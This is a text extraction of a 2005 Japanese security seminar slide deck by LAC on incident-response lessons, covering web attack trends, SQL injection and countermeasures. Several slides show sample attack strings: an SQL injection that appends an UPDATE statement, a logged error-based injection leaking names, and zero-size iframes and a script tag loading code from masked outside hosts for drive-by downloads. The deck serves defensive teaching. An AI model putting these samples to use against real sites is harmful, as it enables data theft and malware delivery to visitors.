最近の緊急対応事例から学ぶ...

最近の緊急対応事例から学ぶセキュリティ対策

平成１７年１１月１日株式会社ラック

三輪信雄[email protected]

Copyright(c) 2005 LAC, All Rights Reserved.

歴任

Firewall MLオーナー、Firewall Defenders(FWD)会長

Japan Windows NT Users Group ntsec-wgメンバ

内閣官房情報セキュリティポリシーガイドラインWG委員

日本ネットワークセキュリティ協会(JNSA)理事セキュリティポリシーWGリーダー

警察庁セキュリティビジネス調査WG委員、不正プログラム調査WG委員

会計検査院セキュリティセミナー講師、警察大学校講師

情報セキュリティ講座講師(早稲田大学、琉球大学)、総務省統一研修講師

情報ネットワーク法学会発起人

セキュリティキャンプ2004実行委員長

内閣官房情報セキュリティ基本問題委員会第一分科会、第二分科会委員他

現在

株式会社ラック代表取締役社長

BUGTRAQ-JP モデレータ

セキュリティキャンプ2005実行委員長

データベース・セキュリティ・コンソーシアム事務局長

著書

「エクストラネット/イントラネット実践!!セキュリティ対策」SRC出版

「セキュリティポリシーでネットビジネスに勝つ」NTT出版

「ネットワーク攻撃詳解」SRC出版、「ネットビジネスのセキュリティ入門」日経新聞社

監訳

「セキュリティポリシーの作成と運用」ソフトバンクパブリッシング

監修

「ネットワークセキュリティとシステム開発」SRC出版

「不正アクセスの手法と防御」ソフトバンクパブリッシング

１．緊急対応案件の概要

２．最近のWebサイト攻撃の推移

３．Webサイトへの攻撃手法

４．多くのWebサイトに潜む脆弱性

５．SQLインジェクション対策事例

６．諸々の考察



20002000～～20022002サーバ侵入、ホームページ改ざんサーバ侵入、ホームページ改ざん

http://www.attrition.org/mirror/attrition/jp.html



20032003～～20042004

大規模な個人情報漏えい大規模な個人情報漏えい【漏えい経路】

元関係者が社外から不正アクセス元関係者が情報持ち出しうっかり紛失、盗難

【動機】個人情報を販売、借金返済漏えいの事実で恐喝、買い戻し要求

ワーム感染ワーム感染【感染経路】

メール、持込みPC、リモートアクセス



20052005大規模な個人情報漏えい大規模な個人情報漏えい

【漏えい経路】Webサイト攻撃うっかり紛失、盗難ワーム感染(ファイル交換ソフト経由等)

【動機】個人情報を販売、借金返済漏えいの事実で恐喝、買い戻し要求

内部ネット破壊内部ネット破壊【行為】

ワーム放流、盗聴、サーバー破壊情報持ち出し

【動機】組織に対する恨み


２．最近のサイト攻撃の推移

http://www.lac.co.jp/news/pdf/20050524.pdf

ラックの監視センターラックの監視センター(JSOC)(JSOC)における攻撃先サービスにおける攻撃先サービス

OSやサービスの脆弱性への対策が進んだ事からWebアプリケーションへの攻撃が増加している




ラックの監視センターラックの監視センター(JSOC)(JSOC)におけるにおけるSQLSQLインジェクション攻撃数の推移インジェクション攻撃数の推移

中国系サイトでの攻撃ツールの公開と共に攻撃が急増しており、現在も続いている

イベント件数

0

20

40

60

80

100

120

140

2003

年1月

2003

年2月

2003

年3月

2003

年4月

2003

年5月

2003

年6月

2003

年7月

2003

年8月

2003

年9月

2003

年10

月

2003

年11

月

2003

年12

月20

04年

1月20

04年

2月20

04年

3月20

04年

4月20

04年

5月20

04年

6月20

04年

7月20

04年

8月20

04年

9月

2004

年10

月

2004

年11

月

2004

年12

月20

05年

1月20

05年

2月20

05年

3月20

05年

4月20

05年

5月20

05年

6月


① 海外からの攻撃トレンド

0

5000

10000

15000

20000

25000

30000

35000

40000

45000

Jan Feb Mar Apr May Jun Jul

KR

US

CN

TW

BR

HK

CA



② 中国からの攻撃トレンド

164Attempt to Proxy SMTP & FTP via HTTP Detected

165SYN Flood Attack Detected

196Suspicious Traffic Containing UPX-Compressed Binary Detected

215Windows ntdll.dll Buffer Overflow Attack Detected

273SQL Slammer Worm Propagation Attempt

293Internet Explorer Activity Detected

537Vertical Scan Detected

1,540Microsoft ASN.1 Library Buffer Overflow Detected

1,978Horizontal Scan Detected

3,148Source IP CorrelatedCountEvent Name



④ 人為的攻撃の増加（その１）



④ 人為的攻撃の増加（その２）



オペレーティングシステムWindowsなど

サービスプログラムIISなど

悪質なプログラム

悪質なプログラム

欠陥や設定ミスを悪用され、欠陥や設定ミスを悪用され、悪質なプログラムを注入され侵入悪質なプログラムを注入され侵入

最近は、修正プログラムの適用徹底が図られてきており、欠陥がなくなってきた

ファイアウォールファイアウォール


イントラネットイントラネットホームページ改ざんホームページ改ざん

踏み台踏み台情報搾取情報搾取

イントラへの侵入イントラへの侵入

従来の手法

欠陥欠陥

インターネットインターネット公開サーバ公開サーバ



イントラネットイントラネット



サービスプログラムIISなど

データベースシステム


データベースデータベース個人情報など個人情報など

データベースプログラム

ホームページプログラム

悪質なプログラムDB操作コマンド・プログラム

（SQLコマンド）

SQL注入（SQLインジェクション）

侵入

者か

らの

命令

侵入

者か

らの

命令

インターネットインターネット公開サーバ公開サーバ

改ざん、搾取改ざん、搾取

システムへのシステムへの侵入侵入


最近の手法



• SQLとはデータベースへの命令

• SQLインジェクション攻撃とは、パラメー

タを偽造して、サイト運営者の意図しないSQL文を実行させる事

– データの読み出し、改ざん、消去

– コマンド実行

SELECT * FROM userinfo

WHERE USER_ID='miwa'

SELECT * FROM userinfo

WHERE USER_ID = 'miwa';

UPDATE userinfo SET NAME='we ar3 watch1ng Uuuu'



ログイン

↓メニュー画面

↓ユーザ情報



他人の情報表示

全件表示



画面上はエラーだけど。。。



わざとエラーを発生させ、そのエラー

メッセージから個人情報などを詐取する。

2005-03-xx 07:39:26 x.x.x.x - 443 GET /example.asp cc=183%20And%20(Select top 1 isNull(cast([FirstName]),…) + char(124) + isNull(cast([LastName])))…|10|80040e07|構文エラー。varchar_値_‘Yusuke|Tahara’_から_int_データ型に変換できませんでした。 500 4953 Microsoft+URL+Control+-+6.00.8862 -




画面に表示させずに、ファイルを

ダウンロードさせることも可能。

<iframesrc=http://www.hoge.com/counter.ap?

id=xxx width=0 height=0></iframe>




クロスサイトスクリプティング６７％セッション管理不備６１％インジェクション系３７％

20042004年にラックが実施した年にラックが実施したWebWebサイト検査結果サイト検査結果




OS,サービスのセキュリティレベルに比べてWebアプリケーションのセキュリティレベルは低い

20042004年にラックが実施した年にラックが実施したWebWebサイト検査結果サイト検査結果



SQLインジェクション対策の基本

• 入力チェックの徹底– 文字種、桁、形式等チェックを入念に！

• 特殊文字の無効化– ‘ ¥ “ ; 等の特殊文字を無効化（変換）

• 例） ‘ ⇒ ‘’、¥ ⇒ ¥¥– DBMSによって特殊文字は異なる

• バインドSQLの利用– Java：PrepareStatement、Perl：prepare関数、

ASP：準備済みSQL• エラーハンドリングの徹底

– エラー原因の詳細は表示しない– Webサーバの設定 or プログラムで適切に制御



緊急対応の例（複数サイトで同様）・サイト停止、連絡 (なぜか金曜夜が多い…)

・ログ緊急分析

・システム全面改修- ログ徹底分析 →

被害特定、各種届け、情報公開、謝罪

- ソース改修 → 全数検査

- サーバ検査 → パッチ、設定変更

- IDS監視、Web IPS運用

・訓練、最終点検

・サイト再開

・セキュリティ文化の構築

・システム再開発


対策後のシステム構成の例

IDS

Web IPSFirewall


・HTTPSはHTTPで監視・SQLインジェクション、クロスサイトスクリプティングなどはWeb専用IPSの精度が高い・万が一の時の為に監視は欠かせない・膨大なトラフィックに耐えうる構成と試験


？？データベース

？WEBアプリ

○安全な設定

○修正パッチ適用

○アンチウィルス

○ファイアウォール

対策対象

従来のサーバ、ネットワークセキュリティ対策

DB監査アクセスコントロールデータ保護

便利な機能の制限

セキュア

プログラミングセキュアなシステム設計


•Webアプリケーションのセキュリティ対策は、

「分かってはいたがやりたくなかった」

•データベースのセキュリティ対策は、「これから」


• SQLインジェクションによる被害が目立つ

• お手軽ツールを使用

• スクリプトキディが反日ブームに便乗

• 侵入そのものを楽しんでいる

• 最終的には破壊など派手な行為

• 悪意の社内ハッカーが急増

• 売買目的で個人情報が盗まれる

• 社内でワーム炸裂は日常的

• botは静かに蔓延中(社内でも、家庭でも)


最近の被害の傾向


• 派手に報道される

• 大手取引先から取引停止も

• 「認証取得が対策」という思い込み

• 情報化時代からの大きな逆行

– ノートパソコン持ち歩き禁止

– 自宅作業禁止

– ファイル共有禁止

– USBメモリ使用禁止


個人情報漏えい事件への反応


• セキュリティ文化が出来ていない

• その場その場で対応を繰り返す

• 防ぐ努力をすればいい、と考えている

• 監視は「余裕が有れば」と考えている

• 技術の現場は「分かっていた」

• 緊急対応時に現れるリーダーシップ


今時の被害企業


参考．RMTRMT(Real Money Trade):

MMORPG(大規模オンラインロールプレイングゲーム)内の

通貨を現金で売買すること。・通貨を稼ぐ時間を省いてレベルを上げたい。

・高価な装備を揃えたい

・周りのみんなに遅れをとりたくない

・中国では武器窃盗で殺人事件も！？


参考．IFRAME<IFRAME>タグ:

HTML文書の中にフレームを埋め込む方法・掲示板やメールでアクセスを稼ぐことも可能

<HTML><CENTER>HPを広めて稼げる！１ヶ月300万円以上の高収入♪♪♪<BR>ネットバイトにどうぞ♪計3社<HR><a href="http://www.*****.net/VENUS/default.asp?agid=ad-web">*******代理店</a><BR><a href="http://www.******.jp/VENUS/default.asp?agid=ad-web">#######代理店</a><BR><a href="http://www.******.com/VENUS/default.asp?agid=ad-web">$$$$$$$代理店</a>

<iframe src="http://misty.******.net/deai/link/rankem.cgi?action=in&id=rabu***" width="0" height="0"></iframe><iframe src="http://aaa.***.net/daio/cgi/enter.cgi?id=0****" width="0" height="0"></iframe><iframe src="http://www.******.com/ranklink/ranklink.cgi?id=******" width="0" height="0"></iframe><iframe src="http://www.******.com/mkr/refer.cgi?******" width="0" height="0"></iframe><iframe src="http://hyperz.******.jp/z/ranklink.cgi?id=******" width="0" height="0"></iframe>

<HR><A HREF="http://www.****.jp/magazine/1088.html">メルマガ登録解除はこちら</A><HR>発行者：**大魔王閣下<HR></CENTER></HTML>


参考．IFRAME<IFRAME>タグ:

・ウィルスを埋め込むことも可能

<iframe src="explorer.htm" width="0" height="0" frameborder="0"></iframe>

<iframe src=http://www.***.***/count/counter.ap?id=a05 width=0 height=0></iframe>

<iframe src=http://www.***.***/count/count1/count.htm width=0 height=0></iframe>

<script language=JavaScript src="http://www.***.***/mg/ad.js"></script>

ブラウザの脆弱性を悪用

•Webページを閲覧しただけで、ファイルがダウン

ロードされる

•Webページを閲覧しただけで、勝手に悪意のプ

ログラムが実行される


ご清聴ありがとうございました

最近の緊急対応事例から学ぶ...

Documents

Transcript of 最近の緊急対応事例から学ぶ...